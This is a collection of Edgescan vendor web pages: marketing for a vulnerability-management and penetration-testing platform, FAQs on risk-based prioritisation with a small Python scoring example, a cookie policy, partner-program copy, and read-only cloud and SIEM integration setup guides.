Since 2015 Edgescan has annually produced the Vulnerability Statistics Report to provide a global snapshot of the overall state of cybersecurity. The report presents a by-the-numbers insight into trends and statistics looking back across a 12-month data set from the previous year, including cyber threats, data breaches, and cyber attacks. Every year the report provides a statistical model, presented using infographics and charts, of the most common weaknesses faced by enterprises to enable data-driven decisions for managing risks and exposures more effectively. This yearly report has become a reliable source for approximating the global state of vulnerability management. This is exemplified by our unique dataset being part of the Verizon Data Breach Report (DBIR), which is the de facto standard for insights into the common drivers for incidents and breaches today.

Methodology of Data Collection

The vulnerability data analyzed for the Edgescan Vulnerability Statistics Report was collected from thousands of security assessments and penetration tests performed on millions of assets; this growing collection of intelligence is stored in our data lake and shared amongst the solutions that comprise the Edgescan Platform. Vulnerability data was sourced from over 250 companies of various sizes, from Fortune 500 to medium and small businesses, across 30 industry verticals.
### Product Documents and Data Sheets

Datasheets and Technical Documents

- Platform Overview
- Penetration Testing as a Service
- Dynamic Application Security Testing
- Network Vulnerability Management
- API Security Testing
- Mobile Application Security Testing
- Attack Surface Management
- AI Insights
- Cloudhook
- Full Stack
- Seamless Integrations
- PCI Approved
- Risk-Rated
- End-to-End Support

### The Platform

The Edgescan Platform: One platform for continuous testing and exposure management

The Platform that gives you continuous security testing, validated risk and proven exploits that will 100% improve your exposure management program.

PTaaS | DAST | NVM | API | MAST | ASM

Unified. Continuous. Accurate.

Welcome to Edgescan, the leading platform for continuous security testing, exposure management, and Penetration Testing as a Service (PTaaS). Gain comprehensive visibility into your cyber footprint with our advanced solutions, designed to provide Continuous Threat and Exposure Management (CTEM). From initial discovery to prioritization and remediation, Edgescan ensures your organization's security is robust and proactive. Download the Edgescan Overview datasheet.

Exposure management

Edgescan’s exposure management solution enhances traditional vulnerability management by prioritizing remediation based on real risk levels. This approach ensures security teams focus on the most critical threats first, reducing overall exposure and improving response times.

- Risk Prioritization: Utilize systems like EPSS, CISA KEV, and CVSS, alongside Edgescan’s proprietary EVSS, to prioritize vulnerabilities.
- Verified Vulnerabilities: Only real and actionable results are delivered, eliminating false positives.
- Unlimited Assessments and Retests: Schedule assessments anytime and retest on demand, ensuring ongoing accuracy.
Key features

- Comprehensive asset discovery and assessment: Utilize Attack Surface Management (ASM) to identify assets requiring protection. Perform vulnerability assessments with a blend of automated scanning and human expertise, ensuring 100% validated results. Prioritize and remediate vulnerabilities quickly with actionable intelligence.
- Best-in-class testing across all platforms: Conduct thorough testing across networks, APIs, web applications, and mobile applications. Use validated vulnerability intelligence and traditional scoring systems for compliance. Leverage proprietary risk and breach rating systems to focus on the most critical vulnerabilities.
- Hybrid approach and continuous testing: Combine automated continuous testing with expert validation for near 100% accuracy. Access consultancy-grade penetration testing delivered by certified security experts (CREST, OSCP). Enjoy unlimited retesting and exposure management across all infrastructure.
- Advanced AI experts: Utilize Edgescan AI Insights to analyze vulnerability data in real time. Benefit from strategic activities related to ransomware prevention, compliance, training, and anomaly detection.
- Proprietary data lake for vulnerability intelligence: Store all vulnerability data in our growing proprietary data lake, shared across solutions. Our proprietary data lake is used to preserve accuracy using intelligent data science and analytics.
Full stack coverage: web applications, network layer (host/server) and APIs

- Application: Web applications (authenticated and unauthenticated), APIs (JSON, XML, WSDL, YAML and Graph), microservice architecture, single page applications, mobile applications.
- Network: Covering cloud endpoints, public and non-public systems, Edgescan delivers continuous vulnerability detection and exposure management.

Why choose Edgescan?

Edgescan’s exposure management solution enhances traditional vulnerability management by prioritizing remediation based on real risk levels.
This approach ensures security teams focus on the most critical threats first, reducing overall exposure and improving response times.

- Accuracy and depth: Continuous security testing with unmatched depth and precision.
- Human expertise: Expert validation ensures actionable, false-positive-free results.
- Scalability: From small businesses to global enterprises, Edgescan scales to meet your needs.
- Proven exploits: Focus only on what is proven to be an active threat and proven to be real.
- Proactive security: Stay ahead of threats with continuous monitoring and rapid remediation.

Never compromise threat protection.

Edgescan Platform FAQs

What is software vulnerability management?

Software vulnerability management refers to the process of identifying, assessing, prioritizing, and mitigating security vulnerabilities in software applications and systems. It aims to proactively detect weaknesses that attackers could exploit, leading to potential security breaches. By regularly patching, updating, and implementing security measures, organizations can reduce the risk of cyberattacks and enhance their overall cybersecurity posture.

What is a vulnerability assessment solution?

A vulnerability assessment solution is a software tool or service that scans and evaluates computer systems, networks, or applications to identify potential security weaknesses and critical vulnerabilities. It helps organizations detect and prioritize risks, allowing them to take proactive measures to strengthen their defenses and protect against cyber threats.
What is a vulnerability scanner?

A vulnerability scanner is a software tool that scans computer systems, networks, or applications to identify security weaknesses and vulnerabilities. It automatically searches for potential entry points for cyberattacks, helping organizations assess their risk levels and take proactive measures to strengthen their defenses and protect against potential cyber threats.

What is a vulnerability management program?

A vulnerability management program is a systematic approach to identifying, evaluating, and addressing security vulnerabilities in an organization’s software, systems, and networks. It involves regular assessments, prioritizing risks, and implementing measures to mitigate threats, ensuring ongoing protection against cyberattacks and maintaining a robust cybersecurity posture.

Risk-based vulnerability management: What is it?

RBVM is the process of prioritizing and remediating vulnerabilities by the risk level that they pose to the organization.

Managing a cybersecurity risk assessment: how can organizations ensure proactive threat identification and mitigation?

To proactively identify and mitigate cybersecurity risks, organizations should conduct regular risk assessments, leverage threat intelligence, stay informed about emerging threats, and implement robust security controls. Continuous vigilance is critical.

Risk-based vulnerability management vs traditional vulnerability management: which one is better for managing vulnerabilities?

RBVM (Risk-Based Vulnerability Management) outshines traditional methods by prioritizing vulnerabilities based on risk impact. It’s a smarter, more effective approach for robust cybersecurity.

Vulnerability risk management tools: What do you need to look out for?

First, there are quite a few vulnerability management (VM) tools out there that cannot accomplish what they claim they are capable of, so thorough due diligence when selecting a VM tool is always recommended.
Beyond VM tool capability, there are often resource constraints within the organization, and in most cases constraints on the expertise and experience available for managing, configuring, and deploying VM tools. Last, even when all of this is accounted for and done properly, there are additional cycles required by an organization to ensure that the outputs of these tools are actionable (i.e., no wasting development cycles on false positives, having enough context and guidance around the remediation, support, etc.).

RBVM Solution: How can cyber security teams leverage it?

Edgescan RBVM is designed to augment an organization’s security team by eliminating the need to own, manage, and configure multiple tools such as network vulnerability scanners and DAST tools. Further, Edgescan RBVM presents only validated vulnerabilities to the platform so teams do not waste cycles on false positives.

Vulnerabilities in cybersecurity can pose significant risks. How can organizations systematically assess, prioritize, and mitigate these vulnerabilities to bolster their digital defenses?

Edgescan RBVM incorporates industry-standard risk rating systems like NIST CVSS, along with third-party threat feeds like the CISA Known Exploited Vulnerabilities (KEV) Catalog and the FIRST.org Exploit Prediction Scoring System (EPSS), and proprietary risk rating systems (i.e. Edgescan Validated Security Score (EVSS) and Edgescan Exposure Factor (EXF)), so organizations have the visibility and flexibility to determine the approach that is right for them.

How do you prioritize critical vulnerabilities based on risk and impact?

There are many different approaches to risk-based prioritization of vulnerabilities. Still, in general, the risk is determined by many factors, including but not limited to the sensitivity of the data that is potentially accessible if a breach were to occur, how likely a vulnerability is to be exploited, and whether the vulnerability is known to have been exploited.
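The answer above names three inputs to risk-based prioritization: data sensitivity, likelihood of exploitation (for which EPSS is the usual public feed) and confirmed exploitation (a CISA KEV listing). The following is an added example of how those inputs can be combined into one ranking; it is not Edgescan's EVSS or EXF, whose formulas are proprietary and not given on this page. The sensitivity tiers, the weighting and the finding records (with placeholder CVE identifiers) are all constructed for illustration.

```python
"""Added example, not Edgescan's EVSS/EXF: a hypothetical risk-based ranking
that combines CVSS (impact), EPSS (likelihood), CISA KEV (confirmed
exploitation) and data sensitivity. All values below are constructed."""
from dataclasses import dataclass

# Constructed sensitivity tiers for the data reachable through an asset.
SENSITIVITY = {"public": 0.2, "internal": 0.5, "confidential": 0.8, "regulated": 1.0}


@dataclass(frozen=True)
class Finding:
    cve: str           # identifier (placeholder values in SAMPLE, not real CVEs)
    cvss: float        # CVSS base score, 0-10 (severity / impact)
    epss: float        # EPSS probability of exploitation within 30 days, 0-1
    in_kev: bool       # listed in CISA KEV, i.e. exploitation confirmed
    sensitivity: str   # one of the SENSITIVITY tiers


def risk_score(f: Finding) -> float:
    """Score in [0, 1]: impact scaled by likelihood and data sensitivity.

    A KEV listing is treated as confirmed exploitation and floors likelihood at
    1.0, so a known-exploited medium CVSS on sensitive data outranks a
    theoretical critical one that nobody is exploiting.
    """
    if not 0 <= f.cvss <= 10 or not 0 <= f.epss <= 1:
        raise ValueError(f"{f.cve}: CVSS or EPSS out of range")
    likelihood = 1.0 if f.in_kev else f.epss
    impact = f.cvss / 10.0
    return round(impact * likelihood * SENSITIVITY[f.sensitivity], 4)


def prioritize(findings):
    """Return (score, finding) pairs ordered most urgent first."""
    scored = [(risk_score(f), f) for f in findings]
    # Tie-break on CVSS, then on identifier, so the order is deterministic.
    scored.sort(key=lambda t: (-t[0], -t[1].cvss, t[1].cve))
    return scored


# Constructed backlog with placeholder identifiers (not real CVE numbers).
SAMPLE = [
    Finding("CVE-0000-0001", 9.8, 0.02, False, "internal"),      # critical, rarely exploited
    Finding("CVE-0000-0002", 6.5, 0.40, True,  "regulated"),     # medium, in KEV, sensitive data
    Finding("CVE-0000-0003", 7.5, 0.90, False, "public"),        # high, very likely, public data
    Finding("CVE-0000-0004", 4.3, 0.01, False, "confidential"),  # low impact, unlikely
]

if __name__ == "__main__":
    for score, f in prioritize(SAMPLE):
        print(f"{score:.4f}  {f.cve}  cvss={f.cvss} epss={f.epss} kev={f.in_kev} {f.sensitivity}")
```

With the constructed backlog the KEV-listed medium on regulated data ranks first and the CVSS 9.8 finding third, which is the point the answer makes: severity alone is not risk. The weights are deliberately simple; a real program would calibrate them against its own asset inventory and revisit them as EPSS and KEV data change daily.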
How can risk-based management strategies help organizations identify and mitigate security risk vulnerabilities effectively?

RBVM (Risk-Based Vulnerability Management) empowers organizations to strategically prioritize and address cybersecurity risks. It’s about smartly managing vulnerabilities to enhance overall security resilience.

### Cookie Policy

At Edgescan we believe that privacy is important. The following information explains the information we collect from website users and how we use it. The following policy specifies what cookies are, and how and which ones Edgescan uses.

1. What are Cookies?

Cookies are small pieces of text used by our website to make your experience more efficient and enjoyable, such as remembering your browsing habits, preferences, login information, and more. The information collected is only related to your browsing, and does not include sensitive information such as banking data.

2. Why do we use Cookies?

Edgescan uses cookies to provide a better browsing experience on our website, remembering your preferences and personalizing relevant content based on your choices and browsing behavior. With this, we seek to adjust the content of our site to make it more relevant to you, facilitating your navigation while assisting in our promotional and marketing efforts.

3. Which Cookies do we use?

The cookies we use are listed below:

3.1. Functionality Cookies

Cookies that allow our website to remember your choices, such as website language, content presentation, login information, among others. They are:

| Cookie name | Provider | Expiration |
| --- | --- | --- |
| _icl_current_language | edgescan.com | 1 day |
| _icl_visitor_lang_js | edgescan.com | 1 day |
| wpml_browser_redirect_test | edgescan.com | Session |

3.2. Performance Cookies

Cookies that allow us to understand how our customers interact with our website, evaluating the most and least accessed pages and other statistical information.
These cookies only collect anonymized data for statistics, and no personal data is collected. They are:

| Cookie Name | Provider | Expiration |
| --- | --- | --- |
| _ga | edgescan.com | 2 years |
| _gat | edgescan.com | 1 day |
| _gid | edgescan.com | 1 day |
| _hjAbsoluteSessionInProgress | edgescan.com | 1 day |
| _hjFirstSeen | edgescan.com | 1 day |
| _hjid | edgescan.com | 1 year |
| _hjid | edgescan.com | Persistent |
| _hjIncludedInPageviewSample | edgescan.com | 1 day |
| collect | google-analytics.com | Session |

3.3. Publicity Cookies

Cookies used to understand the profile of each user in order to direct personalized and relevant advertisements and publicity.

| Cookie | Domain | Description | Duration | Type |
| --- | --- | --- | --- | --- |
| _ga | .edgescan.com | The _ga cookie, installed by Google Analytics, calculates visitor, session and campaign data and also keeps track of site usage for the site's analytics report. The cookie stores information anonymously and assigns a randomly generated number to recognize unique visitors. | 1 year 1 month 4 days | Analytics |
| _gid | .edgescan.com | Installed by Google Analytics, the _gid cookie stores information on how visitors use a website, while also creating an analytics report of the website's performance. Some of the data that are collected include the number of visitors, their source, and the pages they visit anonymously. | 1 day | Analytics |
| _gat_gtag_UA_* | .edgescan.com | Google Analytics sets this cookie to store a unique user ID. | 1 minute | Analytics |
| visitorId | .ws.zoominfo.com | ZoomInfo sets this cookie to identify a user. | 1 year | Functional |
| __cf_bm | .zoominfo.com | This cookie, set by Cloudflare, is used to support Cloudflare Bot Management. | 30 minutes | Functional |
| _cfuvid | .zoominfo.com | No description | session | Other |
| cookieyes-consent | edgescanstage.wpengine.com | CookieYes sets this cookie to remember users' consent preferences so that their preferences are respected on their subsequent visits to this site. It does not collect or store any personal information of the site visitors. | 1 year | Necessary |
| UserMatchHistory | .linkedin.com | LinkedIn sets this cookie for LinkedIn Ads ID syncing. | 1 month | Functional |
| AnalyticsSyncHistory | .linkedin.com | LinkedIn sets this cookie to store information about the time a sync took place with the lms_analytics cookie. | 1 month | Analytics |
| bcookie | .linkedin.com | LinkedIn sets this cookie from LinkedIn share buttons and ad tags to recognize browser ID. | 1 year | Functional |
| lidc | .linkedin.com | LinkedIn sets the lidc cookie to facilitate data center selection. | 1 day | Functional |
| ln_or | edgescanstage.wpengine.com | LinkedIn sets this cookie to register statistical data on users' behaviour on the website for internal analytics. | 1 day | Analytics |
| bscookie | .www.linkedin.com | LinkedIn sets this cookie to store performed actions on the website. | 1 year | Functional |
| li_gc | .linkedin.com | LinkedIn sets this cookie for storing visitors' consent regarding using cookies for non-essential purposes. | 5 months 27 days | Functional |
| __cf_bm | .hubspot.com | This cookie, set by Cloudflare, is used to support Cloudflare Bot Management. | 30 minutes | Functional |
| dtCookie | .gartner.com | This cookie is set by the provider Dynatrace. This is a session cookie used to collect information for Dynatrace. It is a system to track application performance and user errors. | session | Performance |
| dtCookie | .dynatrace.com | This cookie is set by the provider Dynatrace. This is a session cookie used to collect information for Dynatrace. It is a system to track application performance and user errors. | session | Performance |
| rxVisitor | gartner.com | This cookie is set by the provider Dynatrace. This cookie is used to store the visitor ID for returning visitors. | never | Analytics |
| rxvt | gartner.com | This cookie is set by the provider Dynatrace. This is a session cookie used to store two timestamps. | never | Performance |
| dtSa | gartner.com | This cookie is set by the provider Dynatrace. This is a session cookie used for saving the user action, such as Click on Login, across different pages. | never | Functional |
| route-gcrowd-fe-prod | .gartner.com | No description available. | session | Other |
| connect.sid | .gartner.com | This cookie is used for authentication and for secure log-in. It registers the log-in information. | past | Necessary |

3.4. Publicity Cookies: Google

Some or all of the cookies or other technologies that are described below may be stored in your browser, app or device. How Google Uses Cookies.

| Cookie Name | Purpose(s) | Product(s) | Cookie Lifespan | Domain(s) |
| --- | --- | --- | --- | --- |
| __gsas | Advertising | AdSense for Search | 3 months | Set from partner domain |
| __gpi | Advertising | AdSense, Google Ad Manager | 13 months | Set from partner domain |
| __gpi_optout | Advertising | AdSense, Google Ad Manager | 13 months | Set from partner domain |
| NID | Security, Analytics, Functionality, Advertising | AdSense for Search, Google Ads | 6 months | google.com and local variations, e.g. google.de |
| DSID | Security, Functionality, Advertising | AdSense, Campaign Manager, Google Ad Manager, Google Analytics, Display & Video 360, Search Ads 360 | 2 weeks | doubleclick.net |
| test_cookie | Functionality | AdSense, Campaign Manager, Google Ad Manager, Google Analytics, Display & Video 360, Search Ads 360 | 15 minutes | doubleclick.net |
| id | Functionality, Advertising | AdSense, Campaign Manager, Display & Video 360, Google Ad Manager, Search Ads 360 | OPT_OUT: fixed expiration (year 2030/11/09); non-OPT_OUT: 13 months EEA UK / 24 months elsewhere | doubleclick.net |
| __gads | Advertising | AdSense, Display & Video 360, Google Ad Manager, Google Ads | 13 months | Set from partner domain |
| GED_PLAYLIST_ACTIVITY | Advertising | AdSense, Google Ad Manager, YouTube | Session | Set from partner domain |
| ACLK_DATA | Advertising | AdSense, Google Ad Manager, YouTube | 5 minutes | youtube.com |
| pm_sess | Security, Functionality | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 30 minutes | doubleclick.net, google.com |
| pm_sess_NNN | Security, Functionality | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 30 minutes | doubleclick.net, google.com |
| aboutads_sessNNN | Security, Functionality | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 30 minutes | doubleclick.net, google.com |
| FPAU | Analytics, Advertising | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 90 days | Set from partner domain |
| ANID | Advertising | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 13 months EEA UK / 24 months elsewhere | google.com and local variations, e.g. google.de |
| AID | Analytics, Advertising | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 13 months EEA UK / 540 days elsewhere | google.com/ads, google.com/ads/measurement, googleadservices.com |
| IDE | Advertising | Campaign Manager, Display & Video 360, Google Ad Manager, Google Analytics, Search Ads 360 | 13 months EEA UK / 24 months elsewhere | doubleclick.net |
| TAID | Analytics, Advertising | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 14 days | google.com/ads, google.com/ads/measurement, googleadservices.com |
| FPGCLDC | Analytics, Advertising | Campaign Manager, Display & Video 360, Search Ads 360 | 90 days | Set from partner domain |
| _gcl_dc | Analytics, Advertising | Campaign Manager, Display & Video 360, Search Ads 360 | 90 days | Set from partner domain |
| _gcl_au | Analytics, Advertising | Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 | 90 days | Set from partner domain |
| FLC | Advertising | Campaign Manager, Display & Video 360, Search Ads 360 | 10 seconds | doubleclick.net |
| RUL | Advertising | Display & Video 360, Google Ads | 12 months | doubleclick.net |
| FCCDCF | Functionality | Funding Choices | 13 months | Set from partner domain |
| FCNEC | Analytics | Funding Choices | 365 days | Set from partner domain |
| FPGCLAW | Analytics, Advertising | Google Ads | 90 days | Set from partner domain |
| FPGCLGB | Analytics, Advertising | Google Ads | 90 days | Set from partner domain |
| _gcl_gb | Analytics, Advertising | Google Ads | 90 days | Set from partner domain |
| _gac_gb_ | Analytics, Advertising | Google Ads | 90 days | Set from partner domain |
| _gcl_aw | Analytics, Advertising | Google Ads | 90 days | Set from partner domain |
| 1P_JAR | Advertising | Google Ads | 30 days | google.com and local variations, e.g. google.de |
| Conversion | Advertising | Google Ads | 90 days | www.googleadservices.com/pagead/conversion/ |
| YSC | Security | Google Ads, YouTube | Session | youtube.com |
| VISITOR_INFO1_LIVE | Security, Advertising | Google Ads, YouTube | 180 days | youtube.com |
| VISITOR_INFO1_LIVE__k | Security, Advertising | Google Ads, YouTube | 180 days | youtube.com |
| VISITOR_INFO1_LIVE__default | Security, Advertising | Google Ads, YouTube | 180 days | youtube.com |
| FPLC | Analytics | Google Analytics | 20 hours | Set from partner domain |
| _ga | Analytics | Google Analytics | 2 years | Set from partner domain |
| _gac_ | Advertising | Google Analytics | 90 days | Set from partner domain |
| _gid | Analytics | Google Analytics | 24 hours | Set from partner domain |
| _gat[_] | Analytics | Google Analytics | 1 minute | Set from partner domain |
| __utma | Analytics | Google Analytics | 2 years | Set from partner domain |
| __utmb | Analytics | Google Analytics | 30 minutes | Set from partner domain |
| __utmc | Analytics | Google Analytics | Session | Set from partner domain |
| __utmt | Analytics | Google Analytics | 10 minutes | Set from partner domain |
| __utmz | Analytics | Google Analytics | 6 months | Set from partner domain |
| __utmv | Analytics | Google Analytics | 2 years | Set from partner domain |
| AMP_TOKEN | Functionality | Google Analytics | 30 seconds to 1 year | Set from partner domain |
| FPID | Analytics | Google Analytics | 2 years | Set from partner domain |
| GA_OPT_OUT | Functionality | Google Analytics | 10 Nov 2030 (all cookies) | google-analytics.com |
| _ga_ | Analytics | Google Analytics 360 | 2 years | Set from partner domain |
| _dc_gtm_ | Analytics | Google Analytics, Google Tag Manager | 1 minute | Set from partner domain |
| _gaexp | Analytics | Google Analytics, Optimize | Set by customer; max of 93 days | Set from partner domain |
| _gaexp_rc | Analytics | Google Analytics, Optimize | 10 seconds | Set from partner domain |
| _opt_awcid | Analytics | Google Analytics, Optimize | 24 hours | Set from partner domain |
| _opt_awmid | Analytics | Google Analytics, Optimize | 24 hours | Set from partner domain |
| _opt_awgid | Analytics | Google Analytics, Optimize | 24 hours | Set from partner domain |
| _opt_awkid | Analytics | Google Analytics, Optimize | 24 hours | Set from partner domain |
| _opt_utmc | Analytics | Google Analytics, Optimize | 24 hours | Set from partner domain |
| _gcl_gf | Analytics, Advertising | Google Flights | 90 days | Set from partner domain |
| _gcl_ha | Analytics, Advertising | Google Hotel Ads | 90 days | Set from partner domain |
| PAIDCONTENT | Analytics, Advertising | Google Surveys | 30 days | doubleclick.net |
| _opt_expid | Analytics | Optimize | 10 seconds | Set from partner domain |

4. Contact

At Edgescan, your privacy is very important to us, which is why we will always keep this policy up-to-date and notify you whenever there is any change. If you have any questions about this policy or any matter related to the processing of your personal data, please contact us at the following email address: dpo@edgescan.com.

### Thank you

Thank you for downloading our white paper! We hope that the information provided was helpful and informative. Your interest in our research and insights is greatly appreciated. We strive to produce valuable content that can be used to improve your business and your industry. If you have any questions or feedback, please feel free to contact us. Thank you again for your support, and we look forward to providing you with more valuable resources in the future.

### Partner

The Edgescan Partner Program

Whether you're a consultant, a reseller, or a managed service provider (MSP), Edgescan’s award-winning full-stack exposure management & continuous security testing platform will enable you to deliver top-tier security solutions that address today’s evolving cyber threats at scale, all within a flexible and collaborative model.

Partner with a Global Leader

By partnering with a global leader in cybersecurity-as-a-service, you can offer your clients a cutting-edge, end-to-end exposure management solution across the full stack.
Edgescan will do the heavy lifting to create the kind of agile and resilient security posture that’s now essential for any enterprise looking to provide safe digital experiences for its customers. This shield will cover not only the web application layer, but also the host and infrastructure layers that support it. The Edgescan solution combines continuous scanning and assessment of web-facing assets with expert validation of flagged vulnerabilities by our highly skilled team of OSCP and CREST-certified human analysts. This approach has disrupted the cybersecurity space by providing continuous threat profiling that yields false-positive-free reports.

#### Our tools provide Expanded Value

We will empower you to offer top-of-the-line vulnerability management as a service while maximizing your existing in-house capabilities. From penetration testing to remediation services, partnering with Edgescan boosts the depth and breadth of coverage you can offer your clients. With end-to-end support—from training and onboarding to collaborative marketing and post-sales assistance—we are committed to you and your business. Edgescan will provide you with the necessary tools to expand your value to your clients, which is why the Edgescan Partner Program features some of the leading cybersecurity and consulting firms worldwide, and those partners enjoy a 95% customer retention rate. Just as your customers’ success is fundamental to your success, your success is critical to ours. If you win, we win. Do you want to join the Edgescan Partner Program?

#### Pillars of Success

Quality: Our market-leading, full-stack solution enables better value. Edgescan’s market-leading full-stack solution enables our partners to offer differentiated value to their clients.

Flexibility: Every partnership is unique. We’ll work with you to design a collaboration that’s customized to maximize your growth. Edgescan can assist you in making sales or supply all the tools to make them yourself.
Once your partner application is approved, we’ll develop an onboarding plan that’s tailored to your needs.

Support: The best partnerships are built on mutual commitment. Our strategy is to focus on a small number of carefully selected, highly enabled partners in each geographical region. We recognize the importance of agility when competing for business, and we are dedicated to responding to your requests as quickly as possible. This is a continuous journey, and we are committed to supporting your team throughout.

#### Your Channel Team

Once your onboarding process is underway, you’ll be connected with a dedicated Channel Team who will ensure you have everything you need to incorporate Edgescan’s full-stack exposure management platform into your portfolio of services. As part of that process, the team will ensure you receive all training on the platform that meets your company’s specific needs. There will be two overarching goals in mind: to fully integrate the solution into your business and help you distinguish your firm in the market. The Edgescan team will seek a wider understanding of your enterprise, the products and services you offer, where you’re looking to go with your business, and the profile of your clients. Using this background, we’ll work with you to identify new opportunities where there may be scope to provide additional value by building on your existing capabilities. As part of our commitment to support your firm throughout the length of the partnership, your dedicated Channel Team will regularly flag relevant industry press, news reports, market developments, and other strategically useful information that you are free to share with your customers and thereby enhance your status as a trusted advisor providing a different level of service. A powerful solution and a committed partnership—that’s the Edgescan difference.

### Become a partner

#### Edgescan Ignite Partner Program

The Edgescan Ignite Partner Program offers Partners the opportunity to work with a global award-winning managed service solution. Take advantage of a wealth of knowledge and support designed to help you deliver better business outcomes. Edgescan’s approach to vulnerability management allows partners to generate high-value increased recurring revenue.

#### Partner Benefits

- Annualised revenue model
- Increased client integration through Edgescan open API
- Integrate easily with your existing SOC processes and technology
- Ability to white label and run as your own MSS
- Sales and technical training with access to demo portal
- Competitive margins and deal registration discount
- Expand your pen testing services and other service & revenue streams
- Work with Gartner-recommended security as a service platform
- Access to dedicated partner portal
- Dedicated co-branded marketing campaigns
- Direct support from sales team at Edgescan
- PCI-ASV certified approved scanning vendor

Take advantage of a wealth of knowledge and support designed to help you deliver better business outcomes. The Edgescan approach to vulnerability management allows partners to increase margins and recurring revenue through high-value business partnerships.

## Integrations

### ArmorCode

What is ArmorCode: The ArmorCode AppSecOps platform integrates across security tooling to de-dupe, correlate, and orchestrate findings and deliver holistic visibility, agility, and collaboration.
Why use ArmorCode: ArmorCode's intelligent application security platform gives us unified visibility into AppSec postures and automates complex DevSecOps workflows.

Where to set up integrations: Setup is handled entirely within the ArmorCode platform; customers just need to search for Edgescan and they’ll be guided through the setup.

https://edgescanstage.wpengine.com/technology-integrations/ArmorCode/
https://www.armorcode.com/integrations

### Splunk

#### Edgescan Integration Add-on

1. On Splunkbase, search for Edgescan.
2. Click Download.
3. From Splunk Web, click on the gear beside ‘Apps’.
4. Select ‘Install app from file’.
5. Locate the downloaded file and click Upload.
6. If Splunk Enterprise prompts you to restart, do so.
7. Verify the add-on appears in the list of apps and add-ons. You can also find it on the server at `$SPLUNK_HOME/etc/apps/`.

#### Importing data into the Edgescan Integration

1. Edgescan should be available in the list of apps on the left-hand side of your Splunk Enterprise homepage. Click on Edgescan.
2. Under the Inputs tab, select Create New Input.
3. Select one of the options in the dropdown.
4. Enter a Name, Interval, Index, Offset, Limit and X-Api-Token, then click Add:
   a. Name - a name associated with the data, e.g. Edgescan_vulnerabilities
   b. Interval - time interval of the input in seconds, e.g. 900
   c. Index - default
   d. Offset - where the server starts returning rows. Default is 0.
   e. Limit - how many results are returned from the server. Default is 250.
   f. X-Api-Token - API key obtained from https://live.edgescan.com
5. Under the ‘Search’ tab, the search bar lets you search and filter through the results.

Excerpt: Splunk Inc.
is an American software company based in San Francisco, California, that produces software for searching, monitoring, and analyzing machine-generated data via a web-style interface.

### Microsoft Azure

#### Microsoft Azure Onboarding Integration

Keeps your Azure public IP addresses, and hostnames from DNS zones, updated as assets in edgescan.

#### How to connect Azure to edgescan

1. Create an application for edgescan in Azure

Log in to the Azure management portal. Search for App registrations using the search functionality and click through to the App registrations page. Click on the New registration button. Enter a name (we recommend 'edgescan' or something similar), then click Register.

2. Get the Application ID, Application secret key, Directory ID and Subscription ID from Azure

We require four access keys to connect your Azure account to edgescan:
- 'Application (client) ID' of the Azure application you just created.
- 'Directory (tenant) ID' from Azure Active Directory.
- 'Application secret key' of the Azure application you just created.
- 'Subscription ID' of your Azure subscription.

You need to get them from various sections of the Azure portal, so it's probably best to open a text document that you can copy them into. It should all be straightforward if you follow the steps below, so hang in there!

Application (client) ID: Click on the 'edgescan' application that we just created. Click Overview and take a note of the Application (client) ID.

Directory (tenant) ID: You can also get the Directory (tenant) ID from this screen, so let's note that one down too.

Application secret key (in Azure you’re looking for the secret ‘VALUE’): Now scroll down and click on Certificates & secrets in the left navigation panel. Click on New client secret. Enter a description (e.g. ‘edgescan’) and set an expiry date (i.e. how long you want the secret to be valid for). (Please note that edgescan will no longer be able to access your Azure account when the secret expires.) Now click Add and note down the secret ‘VALUE’ (not the Secret ID). This is the Application secret key. Important: you won't be able to see that Application secret key again after you've left this screen, so make sure you copy and paste it now!

Subscription ID: Search for 'Subscriptions' using the search functionality and click to see the 'Subscriptions' menu. Take note of your Azure Subscription ID.

3. Create a role

Select Access control (IAM) from the left menu inside the subscription detail page. Click Add, then click Add role assignment. A new menu will appear on the right of the screen. Type Reader into the search box and click on the Reader item in the drop-down. (We require read-only access in order to fetch your public IP addresses and DNS hostnames.) Assign access to: ensure Azure AD user, group, or application is selected. Select: search for the application we created earlier (e.g. ‘edgescan’ or whatever you chose to name it). Select that application, and click Save.

4. Take note of the Application ID, Application secret key, Directory ID and Subscription ID and provide them to edgescan.

Excerpt: Microsoft Azure Onboarding Integration

### AWS

Two ways of connecting are documented: an AWS Role (STS authentication) and an AWS User (access keys).

#### AWS Onboarding Integration - STS Authentication (AWS Role)

Keeps your EC2 Elastic IP addresses or Amazon Route 53 hostnames updated as assets in edgescan.

Connect AWS to edgescan: create a new IAM role & provide access

1. Sign in to the AWS Management Console and open the IAM console at https://console.aws.amazon.com/iam/.
2. In the navigation pane of the console, choose Roles and then choose Create role.
3. Choose the AWS account role type.
4. Choose Another AWS account and enter the Account ID to which you want to grant access to your resources. This should be Edgescan’s AWS account ID, which must be requested.
5. Select Require external ID, and input edgescan-cloud-onboard- followed by a unique ID. For example, edgescan-cloud-onboard-159ahw8Vq736lmbi.
Note: The external ID will need to be shared with edgescan later, so make sure to take note of it here.

6. Click Next. The new role will need to be granted permissions using the following AWS policies:
   - 'IAMReadOnlyAccess' - used to fetch the "account alias" of the AWS account.
   - 'AmazonEC2ReadOnlyAccess' - used to fetch EC2 Elastic IP addresses.
   - 'AmazonRoute53ReadOnlyAccess' - used to fetch Route 53 hostnames.
7. On the next page, add a role name, edgescan-cloud-onboarder for example, and leave a description if you’d like to go into further detail about the role.
8. Review the role and then choose Create role.
9. Provide edgescan with the External ID and the new Role ARN.

#### AWS Onboarding Integration (AWS User)

Keeps your EC2 Elastic IP addresses or Amazon Route 53 hostnames updated as assets in edgescan.

Connect AWS to edgescan: add a new IAM user & provide access keys

Since you are connecting edgescan to your AWS account via access keys, we recommend creating a new user in your AWS account. When creating a new user, please ensure that Programmatic access is checked. The new user will need to be granted permissions using the following AWS policies:
- 'IAMReadOnlyAccess' - used to fetch the "account alias" of the AWS account
- 'AmazonEC2ReadOnlyAccess' - used to fetch EC2 Elastic IP addresses
- 'AmazonRoute53ReadOnlyAccess' - used to fetch Route 53 hostnames

Accounts with the 'AdministratorAccess' policy could also be used, but we would advise against this.

